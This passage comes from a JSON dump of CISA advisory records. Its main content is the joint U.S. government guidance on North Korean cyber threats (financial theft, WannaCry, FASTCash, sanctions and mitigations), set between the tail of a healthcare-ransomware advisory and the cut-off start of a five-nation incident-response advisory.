Checklist](<https://protect2.fireeye.com/url?k=08e10c16-54b40505-08e13d29-0cc47adb5650-70b9e6fd13ea4f2d&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=bcc423d21d&e=7882426b51>)\n\n[HHS - Cyber-Attack Response Infographic](<https://protect2.fireeye.com/url?k=8497e505-d8c2ec16-8497d43a-0cc47adb5650-ba5cee20bcf28bab&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=dc2b43974c&e=7882426b51>)\n\n[NIST - Data Integrity Publication](<https://protect2.fireeye.com/url?k=0be33d8b-57b63498-0be30cb4-0cc47adb5650-be7b920b52ab7927&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=c89bf12fa8&e=7882426b51>)\n\n[NIST - Guide for Cybersecurity Event Recovery](<https://protect2.fireeye.com/url?k=5335b9d4-0f60b0c7-533588eb-0cc47adb5650-bbc2d82317c6bc45&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=eeb05487cf&e=7882426b51>)\n\n[NIST - Identifying and Protecting Assets Against Ransomware and Other Destructive Events ](<https://protect2.fireeye.com/url?k=348a7900-68df7013-348a483f-0cc47adb5650-5210c734b99339b1&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=9f0f789411&e=7882426b51>)\n\n[NIST - Detecting and Responding to Ransomware and Other Destructive Events ](<https://protect2.fireeye.com/url?k=daf6be91-86a3b782-daf68fae-0cc47adb5650-1f4f5f947a590fa0&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=958743a29c&e=7882426b51>)\n\n[NIST - Recovering from Ransomware and Other Destructive Events ](<https://protect2.fireeye.com/url?k=90b40d5e-cce1044d-90b43c61-0cc47adb5650-bab63aa79a2b0b2a&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=4947ff3a54&e=7882426b51>)\n\n[Github List of IOCs](<https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456>)\n\n### Revisions\n\nOctober 28, 2020: Initial version|October 29, 2020: Updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection|November 2, 2020: Updated FBI link\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-02T12:00:00", "type": "ics", "title": "Ransomware Activity Targeting the Healthcare and Public Health Sector", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2020-11-02T12:00:00", "id": "AA20-302A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:33:15", "description": "### Summary\n\nThe U.S. Departments of State, the Treasury, and Homeland Security, and the Federal Bureau of Investigation are issuing this advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The advisory highlights the cyber threat posed by North Korea \u2013 formally known as the Democratic People\u2019s Republic of Korea (DPRK) \u2013 and provides recommended steps to mitigate the threat. In particular, Annex 1 lists U.S. government resources related to DPRK cyber threats and Annex 2 includes a link to the UN 1718 Sanctions Committee (DPRK) Panel of Experts reports.\n\nThe DPRK\u2019s malicious cyber activities threaten the United States and the broader international community and, in particular, pose a significant threat to the integrity and stability of the international financial system. Under the pressure of robust U.S. and UN sanctions, the DPRK has increasingly relied on illicit activities \u2013 including cybercrime \u2013 to generate revenue for its weapons of mass destruction and ballistic missile programs. In particular, the United States is deeply concerned about North Korea\u2019s malicious cyber activities, which the U.S. government refers to as HIDDEN COBRA. The DPRK has the capability to conduct disruptive or destructive cyber activities affecting U.S. critical infrastructure. The DPRK also uses cyber capabilities to steal from financial institutions, and has demonstrated a pattern of disruptive and harmful cyber activity that is wholly inconsistent with the growing international consensus on what constitutes responsible State behavior in cyberspace. \n\nThe United States works closely with like-minded countries to focus attention on and condemn the DPRK\u2019s disruptive, destructive, or otherwise destabilizing behavior in cyberspace. For example, in December 2017, Australia, Canada, New Zealand, the United States, and the United Kingdom publicly attributed the WannaCry 2.0 ransomware attack to the DPRK and denounced the DPRK\u2019s harmful and irresponsible cyber activity. Denmark and Japan issued supporting statements for the joint denunciation of the destructive WannaCry 2.0 ransomware attack, which affected hundreds of thousands of computers around the world in May 2017. \n\nIt is vital for the international community, network defenders, and the public to stay vigilant and to work together to mitigate the cyber threat posed by North Korea. \n\n[Click here](<https://www.us-cert.gov/sites/default/files/2020-04/DPRK_Cyber_Threat_Advisory_04152020_S508C.pdf>) for an English PDF version of this report.\n\nClick the following links for PDF versions of this report in [Arabic](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_ARA_S508C.pdf>), [French](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_FRE_S508C.pdf>), Japanese, [Korean](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_KOR_S508C.pdf>), [Portuguese](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_POR_S508C.pdf>), [Spanish](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_SPA_S508C.pdf>), and [traditional Chinese](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_TRAD CHN_S508C.pdf>), and Vietnamese.\n\n### Technical Details\n\n#### DPRK\u2019s Malicious Cyber Activities Targeting the Financial Sector\n\nMany DPRK cyber actors are subordinate to UN- and U.S.-designated entities, such as the Reconnaissance General Bureau. DPRK state-sponsored cyber actors primarily consist of hackers, cryptologists, and software developers who conduct espionage, cyber-enabled theft targeting financial institutions and digital currency exchanges, and politically-motivated operations against foreign media companies. They develop and deploy a wide range of malware tools around the world to enable these activities and have grown increasingly sophisticated. Common tactics to raise revenue illicitly by DPRK state-sponsored cyber actors include, but are not limited to:\n\n_**Cyber-Enabled Financial Theft and Money Laundering.** _The UN Security Council 1718 Committee Panel of Experts\u2019 2019 mid-term report (2019 POE mid-term report) states that the DPRK is increasingly able to generate revenue notwithstanding UN Security Council sanctions by using malicious cyber activities to steal from financial institutions through increasingly sophisticated tools and tactics. The 2019 POE mid-term report notes that, in some cases, these malicious cyber activities have also extended to laundering funds through multiple jurisdictions. The 2019 POE mid-term report mentions that it was investigating dozens of suspected DPRK cyber-enabled heists and that, as of late 2019, the DPRK has attempted to steal as much as $2 billion through these illicit cyber activities. Allegations in a March 2020 Department of Justice forfeiture complaint are consistent with portions of the POE\u2019s findings. Specifically, the forfeiture complaint alleged how North Korean cyber actors used North Korean infrastructure in furtherance of their conspiracy to hack digital currency exchanges, steal hundreds of millions of dollars in digital currency, and launder the funds.\n\n**_Extortion Campaigns._ **DPRK cyber actors have also conducted extortion campaigns against third-country entities by compromising an entity\u2019s network and threatening to shut it down unless the entity pays a ransom. In some instances, DPRK cyber actors have demanded payment from victims under the guise of long-term paid consulting arrangements in order to ensure that no such future malicious cyber activity takes place. DPRK cyber actors have also been paid to hack websites and extort targets for third-party clients.\n\n_**Cryptojacking. **_The 2019 POE mid-term report states that the POE is also investigating the DPRK\u2019s use of \u201ccryptojacking,\u201d a scheme to compromise a victim machine and steal its computing resources to mine digital currency. The POE has identified several incidents in which computers infected with cryptojacking malware sent the mined assets \u2013 much of it anonymity-enhanced digital currency (sometimes also referred to as \u201cprivacy coins\u201d) \u2013 to servers located in the DPRK, including at Kim Il Sung University in Pyongyang.\n\nThese activities highlight the DPRK\u2019s use of cyber-enabled means to generate revenue while mitigating the impact of sanctions and show that any country can be exposed to and exploited by the DPRK. According to the 2019 POE mid-term report, the POE is also investigating such activities as attempted violations of UN Security Council sanctions on the DPRK.\n\n#### Cyber Operations Publicly Attributed to DPRK by U.S. Government\n\nThe DPRK has repeatedly targeted U.S. and other government and military networks, as well as networks related to private entities and critical infrastructure, to steal data and conduct disruptive and destructive cyber activities. To date, the U.S. government has publicly attributed the following cyber incidents to DPRK state-sponsored cyber actors and co-conspirators:\n\n * **Sony Pictures.** In November 2014, DPRK state-sponsored cyber actors allegedly launched a cyber attack on Sony Pictures Entertainment (SPE) in retaliation for the 2014 film \u201cThe Interview.\u201d DPRK cyber actors hacked into SPE\u2019s network to steal confidential data, threatened SPE executives and employees, and damaged thousands of computers. \n * FBI\u2019s Update on Sony Investigation (Dec. 19, 2014) <https://www.fbi.gov/news/pressrel/press-releases/update-on-sony-investigation>\n * DOJ\u2019s Criminal Complaint of a North Korean Regime-Backed Programmer (Sept. 6, 2018) <https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and>\n * **Bangladesh Bank Heist.** In February 2016, DPRK state-sponsored cyber actors allegedly attempted to steal at least $1 billion from financial institutions across the world and allegedly stole $81 million from the Bangladesh Bank through unauthorized transactions on the Society for Worldwide Interbank Financial Telecommunication (SWIFT) network. According to the complaint, DPRK cyber actors accessed the Bangladesh Bank\u2019s computer terminals that interfaced with the SWIFT network after compromising the bank\u2019s computer network via spear phishing emails targeting bank employees. DPRK cyber actors then sent fraudulently authenticated SWIFT messages directing the Federal Reserve Bank of New York to transfer funds out of the Bangladesh Bank\u2019s Federal Reserve account to accounts controlled by the conspirators. \n * DOJ\u2019s Criminal Complaint of a North Korean Regime-Backed Programmer (Sept. 6, 2018) <https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and>\n * **WannaCry 2.0. **DPRK state-sponsored cyber actors developed the ransomware known as WannaCry 2.0, as well as two prior versions of the ransomware. In May 2017, WannaCry 2.0 ransomware infected hundreds of thousands of computers in hospitals, schools, businesses, and homes in over 150 countries. WannaCry 2.0 ransomware encrypts an infected computer\u2019s data and allows the cyber actors to demand ransom payments in the Bitcoin digital currency. The Department of the Treasury designated one North Korean computer programmer for his part in the WannaCry 2.0 conspiracy, as well as his role in the Sony Pictures cyber attack and Bangladesh Bank heist, and additionally designated the organization he worked for. \n * CISA\u2019s Technical Alert: Indicators Associated with WannaCry Ransomware (May 12, 2017) <https://www.us-cert.gov/ncas/alerts/TA17-132A>\n * White House Press Briefing on the Attribution of WannaCry Ransomware (Dec. 19, 2017) <https://www.whitehouse.gov/briefings-statements/press-briefing-on-the-attribution-of-the-wannacry-malware-attack-to-north-korea-121917/>\n * DOJ\u2019s Criminal Complaint of a North Korean Regime-Backed Programmer (Sept. 6, 2018) <https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and>\n * Treasury Targets North Korea for Multiple Cyber-Attacks (Sept. 6, 2018) <https://home.treasury.gov/news/press-releases/sm473>\n * **FASTCash Campaign. **Since late 2016, DPRK state-sponsored cyber actors have employed a fraudulent ATM cash withdrawal scheme known as \u201cFASTCash\u201d to steal tens of millions of dollars from ATMs in Asia and Africa. FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions. In one incident in 2017, DPRK cyber actors enabled the withdrawal of cash simultaneously from ATMs located in more than 30 different countries. In another incident in 2018, DPRK cyber actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries. \n * CISA\u2019s Alert on FASTCash Campaign (Oct. 2, 2018) <https://www.us-cert.gov/ncas/alerts/TA18-275A>\n * CISA\u2019s Malware Analysis Report: FASTCash-Related Malware (Oct. 2, 2018) <https://www.us-cert.gov/ncas/analysis-reports/AR18-275A>\n * **Digital Currency Exchange Hack.** As detailed in allegations set forth in a Department of Justice complaint for forfeiture in rem, in April 2018, DPRK state-sponsored cyber actors hacked into a digital currency exchange and stole nearly $250 million worth of digital currency. The complaint further described how the stolen assets were laundered through hundreds of automated digital currency transactions, to obfuscate the origins of the funds, in an attempt to prevent law enforcement from tracing the assets. Two Chinese nationals are alleged in the complaint to have subsequently laundered the assets on behalf of the North Korean group, receiving approximately $91 million from DPRK-controlled accounts, as well as an additional $9.5 million from a hack of another exchange. In March 2020, the Department of the Treasury designated the two individuals under cyber and DPRK sanctions authorities, concurrent with a Department of Justice announcement that the individuals had been previously indicted on money laundering and unlicensed money transmitting charges and that 113 digital currency accounts were subject to forfeiture. \n * Treasury\u2019s Sanctions against Individuals Laundering Cryptocurrency for Lazarus Group (March 2, 2020) <https://home.treasury.gov/news/press-releases/sm924>\n * DOJ\u2019s Indictment of Two Chinese Nationals Charged with Laundering Cryptocurrency from Exchange Hack and Civil Forfeiture Complaint (March 2, 2020) <https://www.justice.gov/opa/pr/two-chinese-nationals-charged-laundering-over-100-million-cryptocurrency-exchange-hack>\n\n### Mitigations\n\n#### Measures to Counter the DPRK Cyber Threat\n\nNorth Korea targets cyber-enabled infrastructure globally to generate revenue for its regime priorities, including its weapons of mass destruction programs. We strongly urge governments, industry, civil society, and individuals to take all relevant actions below to protect themselves from and counter the DPRK cyber threat:\n\n * **Raise Awareness of the DPRK Cyber Threat.** Highlighting the gravity, scope, and variety of malicious cyber activities carried out by the DPRK will raise general awareness across the public and private sectors of the threat and promote adoption and implementation of appropriate preventive and risk mitigation measures.\n * **Share Technical Information of the DPRK Cyber Threat.** Information sharing at both the national and international levels to detect and defend against the DPRK cyber threat will enable enhanced cybersecurity of networks and systems. Best practices should be shared with governments and the private sector. Under the provisions of the Cybersecurity Information Sharing Act of 2015 (6 U.S.C. \u00a7\u00a7 1501\u20131510), non-federal entities may share cyber threat indicators and defensive measures related to HIDDEN COBRA with federal and non-federal entities.\n * **Implement and Promote Cybersecurity Best Practices. **Adopting measures \u2013 both technical and behavioral \u2013 to enhance cybersecurity will make U.S. and global cyber infrastructure more secure and resilient. Financial institutions, including money services businesses, should take independent steps to protect against malicious DPRK cyber activities. Such steps may include, but are not limited to, sharing threat information through government and/or industry channels, segmenting networks to minimize risks, maintaining regular backup copies of data, undertaking awareness training on common social engineering tactics, implementing policies governing information sharing and network access, and developing cyber incident response plans. The Department of Energy\u2019s Cybersecurity Capability Maturity Model and the National Institute of Standards and Technology\u2019s Cybersecurity Framework provide guidance on developing and implementing robust cybersecurity practices. As shown in Annex I, the Cybersecurity and Infrastructure Security Agency (CISA) provides extensive resources, including technical alerts and malware analysis reports, to enable network defenders to identify and reduce exposure to malicious cyber activities.\n * **Notify Law Enforcement. **If an organization suspects that it has been the victim of malicious cyber activity, emanating from the DPRK or otherwise, it is critical to notify law enforcement in a timely fashion. This not only can expedite the investigation, but also, in the event of a financial crime, can increase the chances of recovering any stolen assets. \nU.S. law enforcement has seized millions of dollars\u2019 worth of digital currency stolen by North Korean cyber actors. All types of financial institutions, including money services businesses, are encouraged to cooperate on the front end by complying with U.S. law enforcement requests for information regarding these cyber threats, and on the back end by identifying forfeitable assets upon receipt of a request from U.S. law enforcement or U.S. court orders, and by cooperating with U.S. law enforcement to support the seizure of such assets.\n * **Strengthen Anti-Money Laundering (AML) / Countering the Financing of Terrorism (CFT) / Counter-Proliferation Financing (CPF) Compliance**. Countries should swiftly and effectively implement the Financial Action Task Force (FATF) standards on AML/CFT/CPF. This includes ensuring financial institutions and other covered entities employ risk mitigation measures in line with the FATF standards and FATF public statements and guidance. Specifically, the FATF has called for all countries to apply countermeasures to protect the international financial system from the ongoing money laundering, terrorist financing, and proliferation financing risks emanating from the DPRK.[[1]](<https://www.fatf-gafi.org/publications/high-risk-and-other-monitored-jurisdictions/documents/call-for-action-february-2020.html>) This includes advising all financial institutions and other covered entities to give special attention to business relationships and transactions with the DPRK, including DPRK companies, financial institutions, and those acting on their behalf. In line with UN Security Council Resolution 2270 Operative Paragraph 33, Member States should close existing branches, subsidiaries, and representative offices of DPRK banks within their territories and terminate correspondent relationships with DPRK banks. \n\nFurther, in June 2019, FATF amended its standards to require all countries regulate and supervise digital asset service providers, including digital currency exchanges, and mitigate against risks when engaging in digital currency transactions. Digital asset service providers should remain alert to changes in customers\u2019 activities, as their business may be used to facilitate money laundering, terrorist financing, and proliferation financing. The United States is particularly concerned about platforms that provide anonymous payment and account service functionality without transaction monitoring, suspicious activity reporting, and customer due diligence, among other obligations. \nU.S. financial institutions, including foreign-located digital asset service providers doing business in whole or substantial part in the United States, and other covered businesses and persons should ensure that they comply with their regulatory obligations under the Bank Secrecy Act (as implemented through the Department of the Treasury\u2019s Financial Crimes Enforcement Network (FinCEN) regulations in 31 CFR Chapter X). For financial institutions, these obligations include developing and maintaining effective anti-money laundering programs that are reasonably designed to prevent the money services business from being used to facilitate money laundering and the financing of terrorist activities, as well as identifying and reporting suspicious transactions, including those conducted, affected, or facilitated by cyber events or illicit finance involving digital assets, in suspicious activity reporting to FinCEN. \n\n#### International Cooperation\n\nTo counter the DPRK\u2019s malicious cyber activities, the United States regularly engages with countries around the world to raise awareness of the DPRK cyber threat by sharing information and evidence via diplomatic, military, law enforcement and judicial, network defense, and other channels. To hamper the DPRK\u2019s efforts to steal funds through cyber means and to defend against the DPRK\u2019s malicious cyber activities, the United States strongly urges countries to strengthen network defense, shutter DPRK joint ventures in third countries, and expel foreign-located North Korean information technology (IT) workers in a manner consistent with applicable international law. A 2017 UN Security Council resolution required all Member States to repatriate DPRK nationals earning income abroad, including IT workers, by December 22, 2019. The United States also seeks to enhance the capacity of foreign governments and the private sector to understand, identify, defend against, investigate, prosecute, and respond to DPRK cyber threats and participate in international efforts to help ensure the stability of cyberspace. \n\n### Consequences of Engaging in Prohibited or Sanctionable Conduct\n\nIndividuals and entities engaged in or supporting DPRK cyber-related activity, including processing related financial transactions, should be aware of the potential consequences of engaging in prohibited or sanctionable conduct.\n\nThe Department of the Treasury\u2019s Office of Foreign Assets Control (OFAC) has the authority to impose sanctions on any person determined to have, among other things:\n\n * Engaged in significant activities undermining cybersecurity on behalf of the Government of North Korea or the Workers\u2019 Party of Korea;\n * Operated in the information technology (IT) industry in North Korea;\n * Engaged in certain other malicious cyber-enabled activities; or\n * Engaged in at least one significant importation from or exportation to North Korea of any goods, services, or technology.\n\nAdditionally, if the Secretary of the Treasury, in consultation with the Secretary of State, determines that a foreign financial institution has knowingly conducted or facilitated significant trade with North Korea, or knowingly conducted or facilitated a significant transaction on behalf of a person designated under a North Korea-related Executive Order, or under Executive Order 13382 (Weapons of Mass Destruction Proliferators and Their Supporters) for North Korea-related activity, that institution may, among other potential restrictions, lose the ability to maintain a correspondent or payable-through account in the United States.\n\nOFAC investigates apparent violations of its sanctions regulations and exercises enforcement authority, as outlined in the Economic Sanctions Enforcement Guidelines, 31 C.F.R. part 501, appendix A. Persons who violate the North Korea Sanctions Regulations, 31 C.F.R. part 510, may face civil monetary penalties of up to the greater of the applicable statutory maximum penalty or twice the value of the underlying transaction.\n\nThe 2019 POE mid-term report notes the DPRK\u2019s use, and attempted use, of cyber-enabled means to steal funds from banks and digital currency exchanges could violate multiple UN Security Council resolutions (UNSCRs) (i.e., UNSCR 1718 operative paragraph (OP) 8(d); UNSCR 2094, OPs 8 and 11; and UNSCR 2270, OP 32). The DPRK-related UNSCRs also provide various mechanisms for encouraging compliance with DPRK-related sanctions imposed by the UN. For example, the UN Security Council 1718 Committee may impose targeted sanctions (i.e., an asset freeze and, for individuals, a travel ban) on any individual or entity who engages in a business transaction with UN-designated entities or sanctions evasion. \n\nThe Department of Justice criminally prosecutes willful violations of applicable sanctions laws, such as the International Emergency Economic Powers Act, 50 U.S.C. \u00a7\u00a7 1701 et seq. Persons who willfully violate such laws may face up to 20 years of imprisonment, fines of up to $1 million or totaling twice the gross gain, whichever is greater, and forfeiture of all funds involved in such transactions. The Department of Justice also criminally prosecutes willful violations of the Bank Secrecy Act (BSA), 31 U.S.C. \u00a7\u00a7 5318 and 5322, which requires financial institutions to, among other things, maintain effective anti-money laundering programs and file certain reports with FinCEN. Persons violating the BSA may face up to 5 years imprisonment, a fine of up to $250,000, and potential forfeiture of property involved in the violations. Where appropriate, the Department of Justice will also criminally prosecute corporations and other entities that violate these statutes. The Department of Justice also works with foreign partners to share evidence in support of each other\u2019s criminal investigations and prosecutions.\n\nPursuant to 31 U.S. Code \u00a7 5318(k), the Secretary of the Treasury or the Attorney General may subpoena a foreign financial institution that maintains a correspondent bank account in the United States for records stored overseas. Where the Secretary of the Treasury or Attorney General provides written notice to a U.S. financial institution that a foreign financial institutions has failed to comply with such a subpoena, the U.S. financial institution must terminate the correspondent banking relationship within ten business days. Failure to do so may subject the U.S. financial institutions to daily civil penalties.\n\n### DPRK Rewards for Justice\n\nIf you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State\u2019s Rewards for Justice program could make you eligible to receive an award of up to $5 million. For further details, please visit [www.rewardsforjustice.net](<http://www.rewardsforjustice.net>).\n\n### ANNEX I: USG Public Information on and Resources to Counter the DPRK Cyber Threat\n\n**Office of the Director of National Intelligence Annual Worldwide Threat Assessments of the U.S. Intelligence Community. ** In 2019, the U.S. Intelligence Community assessed that the DPRK poses a significant cyber threat to financial institutions, remains a cyber espionage threat, and retains the ability to conduct disruptive cyber attacks. The DPRK continues to use cyber capabilities to steal from financial institutions to generate revenue. Pyongyang\u2019s cybercrime operations include attempts to steal more than $1.1 billion from financial institutions across the world \u2013 including a successful cyber heist of an estimated $81 million from Bangladesh Bank. The report can be found at <https://www.dni.gov/files/ODNI/documents/2019-ATA-SFR---SSCI.pdf>.\n\n**Cybersecurity and Infrastructure Security Agency (CISA) Technical Reports.** The U.S. government refers to the malicious cyber activities by the DPRK as HIDDEN COBRA. HIDDEN COBRA reports provide technical details on the tools and infrastructure used by DPRK cyber actors. These reports enable network defenders to identify and reduce exposure to the DPRK\u2019s malicious cyber activities. CISA\u2019s website contains the latest updates on these persistent threats: <https://www.us-cert.gov/northkorea>. \n\nAdditionally, CISA provides extensive cybersecurity and infrastructure security knowledge and practices to its stakeholders, shares that knowledge to enable better risk management, and puts it into practice to protect the nation\u2019s critical functions. Below are the links to CISA\u2019s resources:\n\n * Protecting Critical Infrastructure: <https://www.cisa.gov/protecting-critical-infrastructure>\n * Cyber Safety: <https://www.cisa.gov/cyber-safety>\n * Detection and Prevention: <https://www.cisa.gov/detection-and-prevention>\n * Information Sharing: <https://www.cisa.gov/information-sharing-and-awareness>\n * CISA Insights: <https://www.cisa.gov/insights>\n * Combating Cyber Crime: <https://www.cisa.gov/combating-cyber-crime>\n * Cyber Essentials: <https://www.cisa.gov/cyber-essentials>\n * Tips: <https://www.us-cert.gov/ncas/tips>\n * National Cyber Awareness System: <https://www.us-cert.gov/ncas>\n * Industrial Control Systems Advisories: <https://www.us-cert.gov/ics>\n * Report Incidents, Phishing, Malware, and Vulnerabilities: [https://www.us-cert.gov/report ](<https://www.us-cert.gov/report>)\n\n**FBI PIN and FLASH Reports.** FBI Private Industry Notifications (PIN) provide current information that will enhance the private sector\u2019s awareness of a potential cyber threat. FBI Liaison Alert System (FLASH) reports contain critical information collected by the FBI for use by specific private sector partners. They are intended to provide recipients with actionable intelligence that help cybersecurity professionals and system administrators to guard against the persistent malicious actions of cyber criminals. If you identify any suspicious activity within your enterprise or have related information, please contact FBI CYWATCH immediately. For DPRK-related cyber threat PIN or FLASH reports, contact [cywatch@fbi.gov](<mailto:cywatch@fbi.gov>). \n\n * FBI Cyber Division: <https://www.fbi.gov/investigate/cyber>\n\n**FBI Legal Attach\u00e9 Program**: The FBI Legal Attach\u00e9\u2019s core mission is to establish and maintain liaison with principal law enforcement and security services in designated foreign countries. \n\n * <https://www.fbi.gov/contact-us/legal-attache-offices>\n\n**U.S. Cyber Command Malware Information Release. **The Department of Defense\u2019s cyber forces actively seek out DPRK malicious cyber activities, including DPRK malware that exploits financial institutions, conducts espionage, and enables malicious cyber activities against the U.S. and its partners. U.S. Cyber Command periodically releases malware information, identifying vulnerabilities for industry and government to defend their infrastructure and networks against DPRK illicit activities. Malware information to bolster cybersecurity can be found at the following Twitter accounts: @US_CYBERCOM and @CNMF_VirusAlert.\n\n**U.S. Department of the Treasury Sanctions Information and Illicit Finance Advisories. _The Office of Foreign Assets Control\u2019s_** _**(OFAC\u2019s)**_ online Resource Center provides a wealth of information regarding DPRK sanctions and sanctions with respect to malicious cyber-enabled activities, including sanctions advisories, relevant statutes, Executive Orders, rules, and regulations relating to DPRK and cyber-related sanctions. OFAC has also published several frequently asked questions (FAQs) relating to DPRK sanctions, cyber-related sanctions, and digital currency. For questions or concerns related to OFAC sanctions regulations and requirements, please contact OFAC\u2019s Compliance Hotline at 1-800-540-6322 or [OFAC_Feedback@treasury.gov](<mailto:OFAC_Feedback@treasury.gov>). \n\n * DPRK Sanctions \n * <https://www.treasury.gov/resource-center/sanctions/Programs/pages/nkorea.aspx>\n * FAQs - <https://www.treasury.gov/resource-center/faqs/Sanctions/Pages/faq_other.aspx#nk>\n * Malicious Cyber Activities Sanctions \n * <https://www.treasury.gov/resource-center/sanctions/Programs/pages/cyber.aspx>\n * FAQs - <https://www.treasury.gov/resource-center/faqs/Sanctions/Pages/faq_other.aspx#cyber>\n * FAQs on Virtual Currency - <https://www.treasury.gov/resource-center/faqs/Sanctions/Pages/faq_compliance.aspx#vc_faqs>\n\n_**Financial Crimes Enforcement Network (FinCEN)**_ has issued an advisory on North Korea\u2019s use of the international financial system (<https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2017-a008>). FinCEN also issued specific advisories to financial institutions with suspicious activity reporting obligations that provide guidance on when and how to report cybercrime and/or digital currency-related criminal activity:\n\n * Cybercrime \n * <https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2016-a005>\n * Illicit digital currency activity \n * <https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2019-a003>\n * Businesses e-mail compromise \n * <https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2019-a005>\n * <https://www.fincen.gov/resources/advisories/fincen-advisory-fin-2016-a003>\n\n_**Federal Financial Institutions Examination Council (FFIEC)**_ developed the Cybersecurity Assessment Tool to help financial institutions identify their risks and determine their cybersecurity preparedness. The assessment tool can be found at <https://www.ffiec.gov/cyberassessmenttool.htm>.\n\n### ANNEX II: UN Panel of Experts Reports on the DPRK Cyber Threat\n\nUN 1718 Sanctions Committee (DPRK) Panel of Experts Reports. The UN Security Council 1718 Sanctions Committee on the DPRK is supported by a Panel of Experts, who \u201cgather, examine, and analyze information\u201d from UN Member States, relevant UN bodies, and other parties on the implementation of the measures outlined in the UN Security Council Resolutions against North Korea. The Panel also makes recommendations on how to improve sanctions implementation by providing both a Midterm and a Final Report to the 1718 Committee. These reports can be found at <https://www.un.org/securitycouncil/sanctions/1718/panel_experts/reports>.\n\n### References\n\n[[1] FATF Call to Action on North Korea](<https://www.fatf-gafi.org/publications/high-risk-and-other-monitored-jurisdictions/documents/call-for-action-february-2020.html>)\n\n### Revisions\n\nApril 15, 2020: Initial Version|April 30, 2020: Added PDF versions of this report in Arabic, French, Japanese, Korean, Portuguese, Spanish, and traditional Chinese.|June 16, 2020: Added PDF version of this report in Vietnamese.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-23T12:00:00", "type": "ics", "title": "Guidance on the North Korean Cyber Threat", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2020-06-23T12:00:00", "id": "AA20-106A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-106a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:31:31", "description": "### Summary\n\nThis joint advisory is the result of a collaborative research effort by the cybersecurity authorities of five nations: Australia,[[1](<https://www.cyber.gov.au/>)] Canada,[[2](<https://www.cyber.gc.ca/en/>)] New Zealand,[[3](<https://www.ncsc.govt.nz/>)][[4](<https://www.cert.govt.nz/>)] the United Kingdom,[[5](<https://www.ncsc.gov.uk/>)] and the United States.[[6](<https://www.cisa.gov/>)] It highlights technical approaches to uncovering malicious activity and includes mitigation steps according to best practices. The purpose of this report is to enhance incident response among partners and network administrators along with serving as a playbook for incident investigation.\n\n#### **Key Takeaways**\n\nWhen addressing potential incidents and applying best practice incident response 